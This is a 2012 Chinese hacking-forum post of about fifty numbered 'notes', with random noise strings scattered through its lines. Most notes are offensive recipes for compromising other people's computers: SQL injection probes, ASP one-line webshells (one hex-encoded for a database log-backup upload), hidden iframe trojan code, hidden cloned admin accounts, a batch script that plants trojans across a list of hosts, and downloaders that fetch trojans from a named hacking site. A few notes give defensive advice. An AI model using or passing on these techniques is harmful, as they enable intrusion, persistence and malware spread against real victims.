找回密码
 立即注册
查看: 2673|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,  F! A1 R: V8 Z
cacls C:\windows\system32 /G hqw20:R  ~) P  O+ M; ~% W
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入& V* k9 K/ [& C* l5 A
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
& l- x  y0 r# |- D) q- a$ G0 A+ V/ l3 k% m3 M( W! Z: l) G8 A
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
5 z+ B2 d0 d( W$ H5 l$ P/ L0 e7 t6 ^
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。. ]2 Q6 k5 k" y. w; D8 s
  e$ Q7 b" n* k. z) V
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号0 L; r7 P. ]) w( G; l
! X( W' F+ @7 L% x. Z, Y8 f
5、利用INF文件来修改注册表; ~/ m. b8 X1 }2 a6 u1 s# V
[Version]
  W; d1 \# a3 u! p8 i! `Signature="$CHICAGO$"9 R. h$ x6 ~) Z% F* G
[Defaultinstall]
1 o. n( X8 t$ a9 p/ h% i$ C$ naddREG=Ating
, S6 n3 a, S- [- o; t4 }0 Z7 f[Ating]& H: c4 `. A6 _: W
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
4 c& e' o: I3 M  [以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:& Q: J# T8 Y$ R' m* M% ~5 s  D2 I
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径0 W7 E  Q8 U3 k; \
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU+ D( x/ e  K! x1 c( A2 v9 t' ?5 ?, C
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
4 `3 d9 d# R) `4 hHKEY_CURRENT_CONFIG 简写为 HKCC
8 T- L2 F" b& v( i! e" t0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; J: w' i. m; Z: k% \" j
"1"这里代表是写入或删除注册表键值中的具体数据
4 b. H9 T9 J( C( C# y; ]) J% o% w* M: @& ?" u! R
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; K; q6 B, j7 O4 I$ J( f
多了一步就是在防火墙里添加个端口,然后导出其键值
, k; a9 L0 R* @1 T[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
( P; q" d7 f( O3 q7 E  x4 d) X* n' s! {4 G
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
, r, y; x  s6 [( ]$ Y" x, O在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。) j1 b8 H7 A& M2 L% F! X
9 u* X# F5 {% _. K
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
" [( F* g4 A9 ^; D' V0 t
& y9 y* S; q$ o$ m9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
5 y* R  G$ h6 z( y  G6 E可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
/ |; E$ `9 a8 M8 \# ]# _7 c! r8 a- l
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
- f3 w( ?  b7 q& W1 p9 \7 d$ d. j0 u% H
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,3 i6 s# M" X' r+ K3 r1 y
用法:xsniff –pass –hide –log pass.txt
# ~& H& l! H! B& ]9 |( p  Z6 G7 S5 f' V9 _2 k# I5 r
12、google搜索的艺术
0 K9 @+ J* L0 M2 v搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# |9 f8 Z% `  G% d8 m
或“字符串的语法错误”可以找到很多sql注入漏洞。
* k! q# O- }: s! o$ r& n- r9 [' e$ z" A8 N$ S' E
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。0 H) e& Q! F8 F; v4 {  k( y) F

" Q- _: {0 w- [/ Q14、cmd中输入 nc –vv –l –p 1987  _- s: ^; N4 T
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃( H7 U9 f( k( [: r) W6 M2 j

3 J0 |8 @  }# {15、制作T++木马,先写个ating.hta文件,内容为
! G" O6 w' f5 C: ~! s9 P<script language="VBScript">0 Z5 }% d# m9 t1 c8 W
set wshshell=createobject ("wscript.shell" )* h9 a' n9 K, G, l
a=wshshell.run("你马的名称",1)5 q- E$ Z$ @: n0 s6 a: [
window.close
/ y) ~2 |8 @' }$ L: u* ^</script># k% K3 P+ G! h
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
* \& S9 \! ?7 K  t% v  r5 M1 L/ _+ A6 h7 T4 R. i3 d9 j
16、搜索栏里输入
" {! l+ B0 T0 f/ A. T. h# [- O关键字%'and 1=1 and '%'='
5 }5 e/ D$ g# h) b. Y/ Z关键字%'and 1=2 and '%'='1 k% U5 d% Y! g4 ]! K$ b) s
比较不同处 可以作为注入的特征字符
6 q  [! ^0 M% Q) D8 q3 h, D: i
0 p4 Y  B5 `" L0 o  m  y+ Q17、挂马代码<html>- X) L. \2 G5 u5 X
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 Z: M3 W& d" o: n</html>
* l( N4 X! F9 _9 f* x5 N8 [% O5 f2 W' T, N2 {" R' Z
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,% k9 o5 e2 _0 C' o5 N
net localgroup administrators还是可以看出Guest是管理员来。: m$ A9 o+ m, Q4 A3 X) O
. L5 Y. Z- P7 \; _* Z; E9 u
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等% K2 Z; b/ _- p, B
用法: 安装: instsrv.exe 服务名称 路径( F" V8 \' k; o# \1 d  G- k# V
卸载: instsrv.exe 服务名称 REMOVE& V- [3 R# F# _" t0 M* x3 f
! m4 P8 S0 Y" ^  R

" _" _6 z# k4 M; i/ S2 z21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉! ]1 M8 b( \8 r5 a1 B  ?
不能注入时要第一时间想到%5c暴库。) Q4 ^' k$ j/ B3 m* f! F9 ]
) S, F: C) @' F6 `$ A- X
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
% \' b8 E( K8 b  ~
% y) S1 i  n  y( M1 J& j  Q0 I23、缺少xp_cmdshell时& L. Q) o& {8 M* s
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'7 t# ^; I% g4 |, l! g, I
假如恢复不成功,可以尝试直接加用户(针对开3389的)2 S. n/ |* T4 k( T. p, i8 A
declare @o int$ d* Z# j$ H/ j, {' a& I- p4 g
exec sp_oacreate 'wscript.shell',@o out$ D% e" f* U# f6 s! p! o! ]
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员1 K1 i  h( C6 B) H6 B

* H! w  A8 [* ^2 O24.批量种植木马.bat
$ s6 j4 ~$ r" N$ o; ?0 u3 Nfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
, R7 q/ F0 y! k/ q: Kfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间. S6 V  ?4 ?  Q0 O. ]
扫描地址.txt里每个主机名一行 用\\开头
$ q3 P. A0 R$ W7 d# v3 P% a, d( ~4 r4 ~% X4 d$ a1 o
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
/ p5 I$ X  A* t0 l% }: {
3 ^! R. c: B8 f26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& U8 }3 N7 Y+ J. n- P! y7 ^将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.5 s5 Q! k+ a+ h! j' H
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 f/ [5 B5 U9 i# L

1 A: m; n  Y9 J9 E2 R9 H3 T27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP, H* g2 i# ~# i  ]2 }4 G# V6 G0 \
然后用#clear logg和#clear line vty *删除日志
. x% D% U/ @! f3 }" z2 c( _+ [, ^: G4 D! h( ^/ W
28、电脑坏了省去重新安装系统的方法& w9 e8 ~; c- n8 \
纯dos下执行,
. [/ A6 ~6 a) A8 l" }xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' c7 l) g. Z7 a! \
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config0 @: J3 P0 z4 x4 ^
1 |; i8 s# ~( v5 n3 S/ a9 l
29、解决TCP/IP筛选 在注册表里有三处,分别是:3 |4 Q( A5 c: c, s6 v$ N2 r
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip( o5 Q3 w) X: h# B3 v$ l) F
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ O# y! g+ ]: L) c! x! LHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ u. Z: f. x* a2 ~0 a) L' ]2 }分别用2 p5 r. S. q) d  @( _$ [
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' W4 d& B2 R: L9 V+ Hregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, s$ E3 [& m3 g! B5 V  Iregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ {( T3 T% Y' Z& Y) m* @
命令来导出注册表项5 F- [. s' R8 t2 V0 B9 D. S
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
* D7 U! Q( \  L6 C; f1 ?" K' X( E2 Z改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用6 _, q1 D0 @; W8 M5 `' x
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
7 K$ ]! r# @# A' w  l7 {* X; K) ~3 h2 h4 |
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
% }8 P9 q6 l) y. ESER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的32 G1 h: n" H6 _  A" H9 w$ s
3 n/ X/ c3 i4 b$ M, H- d. O- L  ^8 H6 \
31、全手工打造开3389工具/ \- f: O, K' |: L, M
打开记事本,编辑内容如下:6 L" l9 N- h# E% Q" E
echo [Components] > c:\sql& t4 [; `  y( E4 ^) S
echo TSEnable = on >> c:\sql/ T& f5 k5 P9 M  Y$ b5 Q$ c) X
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q" ~4 F. F7 {  ?* A4 b
编辑好后存为BAT文件,上传至肉鸡,执行" e" t3 x# u% ]: W) Q% }4 ]
$ @0 _: y( u9 a  D2 j  m0 ~
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
3 p3 \9 O+ b# X6 {
% V0 C' `2 M1 w2 R' S6 ]33、让服务器重启8 W1 h: e6 G. u! c5 U
写个bat死循环:
2 ~. D# v( `" X9 d+ i( a2 v: D@echo off, s; M: C3 G4 B7 ~; i1 K. x
:loop1
# u5 N6 J0 Y8 `cls- L; |( l! K; N* I
start cmd.exe4 T2 b% u4 h2 A
goto loop14 K# ?: ~; e1 g% v% m% n0 B
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
2 o. K# l) A1 U2 k, K& G* L
3 Q6 \: o1 o  o! g9 f8 _34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,8 N: C5 m! q" T* y2 Q$ }8 C
@echo off
5 w: Q; w0 z& ~/ o' L" v- I/ Pdate /t >c:/3389.txt
+ [2 K/ @' E7 O! z8 _# G( etime /t >>c:/3389.txt
2 |/ _3 X6 K. l2 N+ m  f: S' aattrib +s +h c:/3389.bat
7 N, L3 ^% L( z9 j4 fattrib +s +h c:/3389.txt
2 M8 `# R8 H/ l& R+ ?netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
# Y" t0 H2 j0 `1 a- F: b2 c% {8 e7 m并保存为3389.bat
# P+ H* A, V: J2 U! s打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号! H4 O+ l$ C  Y, l
1 w2 f8 M; M) g! X
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
) B+ k- S) {4 }, vstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' t/ z  m# [2 g( S4 Y, h# b* i输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。0 s) }# h) Q1 E5 C$ [6 c; Y, e( Y
0 a7 \; J; X, Y! C
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件2 k& f$ g6 G, \) ?9 n1 C* K" h
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址- C# k+ k$ o9 y4 y3 w8 `
echo 你的FTP账号 >>c:\1.bat //输入账号
" k9 o$ q2 P4 Hecho 你的FTP密码 >>c:\1.bat //输入密码; ^9 V. F) X9 ^3 H# W7 T
echo bin >>c:\1.bat //登入
  t) Y2 `3 F/ G9 m; |1 Z5 e2 C% ~echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
- S- L* y4 G, G! w2 N4 I5 w% Decho bye >>c:\1.bat //退出
+ {3 m3 v) ~" @" u% W然后执行ftp -s:c:\1.bat即可! I6 [/ }# z9 T0 q: Z

# b' W( O9 N' I1 w  ^/ a2 ]37、修改注册表开3389两法
% [; z- _3 [7 v( F, O$ u( p(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表+ W: b0 N8 \& B/ P- e0 t% a, @
echo Windows Registry Editor Version 5.00 >>3389.reg
7 j. K% f/ L; T4 ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
  K' L4 P" a' N- Kecho "Enabled"="0" >>3389.reg
) h6 k+ f6 K8 j/ U- C* h( zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
# E1 f+ O* y/ n0 KNT\CurrentVersion\Winlogon] >>3389.reg  E. o2 W: I' q* S( W
echo "ShutdownWithoutLogon"="0" >>3389.reg" }1 G: i. \4 C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]/ e6 ~, Q' q: z2 Q; m
>>3389.reg
+ _9 ]% d; s& a* Oecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
  H5 V7 X( H4 i0 T2 v# Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
" S$ q# Q) H# E! |5 r( h' Y>>3389.reg
1 w7 U2 y0 d( r7 ~* Z! ~4 recho "TSEnabled"=dword:00000001 >>3389.reg
  R; Q" e3 V- e. F* Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg( L. B; {( J; p$ y+ x: O2 E' Z; v
echo "Start"=dword:00000002 >>3389.reg
/ p: Z  {3 ^5 C% }! v. G$ fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; @( j" S. o( o. H
>>3389.reg1 }5 ]) I! S% i9 g! b
echo "Start"=dword:00000002 >>3389.reg9 x; h- h3 k) Q( D% o! h& f- _
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
1 g& [4 b" l3 U8 ?! O/ Decho "Hotkey"="1" >>3389.reg
* f' m# Z& n+ oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: C' \/ z9 w9 {/ `) v7 H
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
: g( W/ _$ _: qecho "PortNumber"=dword:00000D3D >>3389.reg1 f* F2 |" l+ D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 q4 P4 ]: O3 q- U1 F. b% U. }/ G3 d' j5 h
Server\WinStations\RDP-Tcp] >>3389.reg- G1 H: _8 ~. z" r6 T; X
echo "PortNumber"=dword:00000D3D >>3389.reg
9 U! M3 {+ e1 I* g" K0 Y把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。. v% I9 `! Y' E' y5 d3 g* F
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)% ?4 s& }$ ?* f1 }# ~4 v- q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
" }; Y2 O8 z+ q(2)winxp和win2003终端开启( V# M5 J& J  Q" J
用以下ECHO代码写一个REG文件:
$ g' t& `0 L5 c* r+ r. Jecho Windows Registry Editor Version 5.00>>3389.reg( C% o9 y8 U' L5 @1 ^5 I4 F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! F. _4 H: h8 A, s
Server]>>3389.reg: Q( u& F/ c' c. v5 T
echo "fDenyTSConnections"=dword:00000000>>3389.reg
' P9 h0 O& |- m4 A8 V) cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ Q6 E! Z/ R2 L# Q
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
& B5 @; W& J& b+ Cecho "PortNumber"=dword:00000d3d>>3389.reg
  T. c" I6 z: {5 ?9 D8 r2 f3 o8 Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 p/ x, ^$ z2 w( R
Server\WinStations\RDP-Tcp]>>3389.reg
  t  y$ L) N. x! `$ _8 ~echo "PortNumber"=dword:00000d3d>>3389.reg% Z0 c9 [: \% |" G' A, b
然后regedit /s 3389.reg del 3389.reg$ k8 b8 k+ V# u
XP下不论开终端还是改终端端口都不需重启. g4 X8 b' G% T( p$ K; c& L
" \, k: ]9 ]8 ?! }, z! Z0 n8 S
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃/ p- p# V* p, j8 n8 a- y- N
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) b7 q1 [$ A: K7 G5 m( X
- d) ^9 m! B8 R1 B$ v7 [' d39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!9 t! _$ |( K& c! c7 m
(1)数据库文件名应复杂并要有特殊字符
1 r* W3 ^# C& z0 ?" p) @& c: W- t% @(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
  a1 U+ L6 S6 j: X% d. \. @2 [将conn.asp文档中的# {; g5 L! d7 N# W5 E) I
DBPath = Server.MapPath("数据库.mdb"), i3 l0 B) C% \& J: \
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 f/ K- {! z' \- d2 Z# T
/ L" i0 ^% b# z% s" }
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置1 t5 C$ @! y- l# q& v" m
(3)不放在WEB目录里
0 K( P' `) A) T8 c$ \( D6 E& B
) K4 A+ d6 J! C7 z3 w; D/ P6 U40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
: j6 N1 I/ H, o4 O! z* ^) o可以写两个bat文件
& p1 ~- g0 P# c/ g: f4 G$ Y@echo off
7 |" ~: @- h+ Q* X@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
4 k1 N- \0 F& a' U2 z8 s0 X@del c:\winnt\system32\query.exe
" U2 c- X& B6 q- L( c@del %SYSTEMROOT%\system32\dllcache\query.exe
: u/ K; Y; p$ }9 O@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的" R9 L1 |) ]7 i& e% o/ O" O5 U: A- \9 Q

2 _) p# w6 m- [@echo off
0 V) f. E! M0 v. L@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
4 b2 X- s, b- Y2 e@del c:\winnt\system32\tsadmin.exe7 n. t! ?  c, S( Z5 e  T
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex. l( B! y( [: X2 H# Y( R
! Z: L4 E% U; l; K: p5 K+ }! D  b
41、映射对方盘符
3 E$ |1 Y7 t& ]8 {9 n2 }# wtelnet到他的机器上,, {/ N  l1 H% Q- p/ q  }
net share 查看有没有默认共享 如果没有,那么就接着运行2 ]  e# N4 W- I1 J( R7 q
net share c$=c:
. M+ E1 o" r) U# L! E. q$ Anet share现在有c$" X4 u& _1 K( G9 ]" ~* b4 W3 }, P
在自己的机器上运行
' l% Z$ N; y2 _. V2 s% H; ^& lnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K7 ^/ Q6 x2 q; P; L

4 q( l  u1 v) \, O42、一些很有用的老知识  c8 R: ?- t; q4 ^
type c:\boot.ini ( 查看系统版本 )* E! Z$ R+ {% @3 C
net start (查看已经启动的服务)6 F* U) ^- g" g
query user ( 查看当前终端连接 ). Z% S* @4 g3 L/ G& e& n2 Y8 `2 K
net user ( 查看当前用户 )
  Y4 v) p6 f& w5 [( g9 |* H6 o: N- hnet user 用户 密码/add ( 建立账号 )
# o+ g! Z% A: Y& h1 N" Bnet localgroup administrators 用户 /add (提升某用户为管理员)* V# A6 u5 S8 W0 H  w$ o
ipconfig -all ( 查看IP什么的 )
% h# f* o# H9 L0 X! z4 anetstat -an ( 查看当前网络状态 )
! m+ G9 ~$ p- J: N1 x" i- Xfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
5 C/ L$ F( R$ C克隆时Administrator对应1F4! `/ R; a' b9 y/ {0 k0 r- T# F5 T# v
guest对应1F5
* T' X; [8 V7 b$ Vtsinternetuser对应3E8
" |$ K3 s+ F2 j) m2 l( \2 Y
9 y; h/ I& f; i+ l+ e  H# f43、如果对方没开3389,但是装了Remote Administrator Service
# a3 c1 g; [/ N. c2 C2 Y4 E用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接4 U3 a! A' z$ d' q1 j1 H1 W1 L
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 C5 }: ^* b& R0 H7 \$ v先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
" }; r+ t) r, L. E% Y
5 s3 N' A8 T" |/ ~9 U- @( C: D44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
- w+ O" x# `5 a% D  h  j% r8 f本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
- A. r3 V2 a' f4 _0 X' a7 r
+ w! v$ a0 d, c45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)  ?) Q! Z/ Y, \+ w3 Q# P
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open' F6 ]5 W9 g  A& V8 T2 S7 O
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ \; l, f- t4 j) m2 j1 V- jCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
$ q* s1 T( Q" x1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs/ y+ ?" q' ]2 P! G6 }
(这是完整的一句话,其中没有换行符)6 s+ `! ]% e1 R3 Z8 T* q3 H" |" x  c3 t
然后下载:1 O' v: f& j4 N3 x
cscript down.vbs http://www.hack520.org/hack.exe hack.exe( @0 U- [: ]0 F( w; N1 W7 h6 b

5 {7 G5 K! L6 v9 u) K5 Z6 H46、一句话木马成功依赖于两个条件:
! @% j3 |$ H/ }- W. c1、服务端没有禁止adodb.Stream或FSO组件
" j( e3 g5 O, F: Z2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。: ^7 y3 f) i6 K" g* r5 H

. X1 @3 g0 [+ ^1 d" U47、利用DB_OWNER权限进行手工备份一句话木马的代码:& a/ u( [8 l2 G% c
;alter database utsz set RECOVERY FULL--
9 ?) B$ f) N+ w; B! E  B;create table cmd (a image)--3 M9 C. p. w" e+ d8 p
;backup log utsz to disk = 'D:\cmd' with init--
7 g* b) D5 R, k2 n1 k3 ?! c" ?;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
8 Z) }: w  `; y, Y4 h;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--' r9 j: Y5 s; I; F
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
" k7 R; A% {' d8 a
( t" Y* Y' l2 k48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:% V0 C1 L( o9 @" }) J  K# I
; I+ z$ e- V0 b+ H0 f
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
. _0 e3 M" M' u8 D5 Y所有会话用 'all'。
0 o, x5 J) }3 H) }* I8 H) Q0 N% Y-s sessionid 列出会话的信息。8 A" l+ T9 K) l$ x4 A- ?: h. x# D
-k sessionid 终止会话。  W5 V# S/ i" H, G' Z- S
-m sessionid 发送消息到会话。  h9 v2 r6 _7 }' E2 k$ t2 p
2 W# ~) w! Q$ _% V5 f% }
config 配置 telnet 服务器参数。+ w, W0 ^+ E7 `% G( ^1 O' u

7 A3 q8 |/ }4 Ucommon_options 为:4 y) f) M- E' M5 g
-u user 指定要使用其凭据的用户: e1 ]( {2 Q; y
-p password 用户密码
9 G; m5 `( X6 s; u# _( A+ V2 ?1 h1 r7 b5 u- b! X* Q
config_options 为:
) }% N- `: |2 x: w# ]dom = domain 设定用户的默认域7 h- e* q: I+ ~# V5 Y! D( t* |
ctrlakeymap = yes|no 设定 ALT 键的映射
0 |: B5 g+ p/ s& C# i7 u2 I$ Etimeout = hh:mm:ss 设定空闲会话超时值4 r3 Y2 o+ {" F: ^4 l. p
timeoutactive = yes|no 启用空闲会话。
# M) V- z4 t! A3 \+ M5 Kmaxfail = attempts 设定断开前失败的登录企图数。# A6 `7 i4 R+ B$ A$ _: P# A
maxconn = connections 设定最大连接数。6 R* n" _# k( l) q+ e
port = number 设定 telnet 端口。- x8 @( a4 {" Z$ E! k, P. o
sec = [+/-]NTLM [+/-]passwd! S! x: k( G9 r9 n( V  e, ?
设定身份验证机构- I8 m0 e5 J; K& ?
fname = file 指定审计文件名。* f: r1 d  d9 y% `; S. O$ m8 e
fsize = size 指定审计文件的最大尺寸(MB)。1 N5 `' Q9 w; K2 |$ `1 r9 ?
mode = console|stream 指定操作模式。
% X$ @. f# k! a& o! Hauditlocation = eventlog|file|both
( v! T9 X( T5 S1 \- ?  h指定记录地点
4 n; }0 `! }# p! o- Aaudit = [+/-]user [+/-]fail [+/-]admin* F& F3 B9 P; R% Q4 @$ A5 ^
: l, x5 Z. K4 r$ i" n8 f8 u$ _" |
49、例如:在IE上访问:# a) R& }5 i' r: I" d, k
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/% S% [% Z) @) a# O' ]+ O! u
hack.txt里面的代码是:6 V; c  k8 _* d! i+ _8 q" `, }# j5 `
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">/ q  c8 C/ G/ {8 ^
把这个hack.txt发到你空间就可以了!9 ^" F* F, M0 z& w  u: J
这个可以利用来做网马哦!
9 e! d! b8 E) P. r9 T$ r. ~  m: D. ]' {% X* K
50、autorun的病毒可以通过手动限制!; Z  W. U$ d5 d$ o2 s% {
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!: m5 o* X0 H. L& I
2,打开盘符用右键打开!切忌双击盘符~: q: R3 \1 Q9 ^" A
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* A. Y. a3 Y2 J( S
4 T1 B: d' U. y4 y9 C
51、log备份时的一句话木马:
* _4 F+ f' s& G( Aa).<%%25Execute(request("go"))%%25>5 u2 v/ D5 r' l% ]* O$ w* g% ]  W
b).<%Execute(request("go"))%>
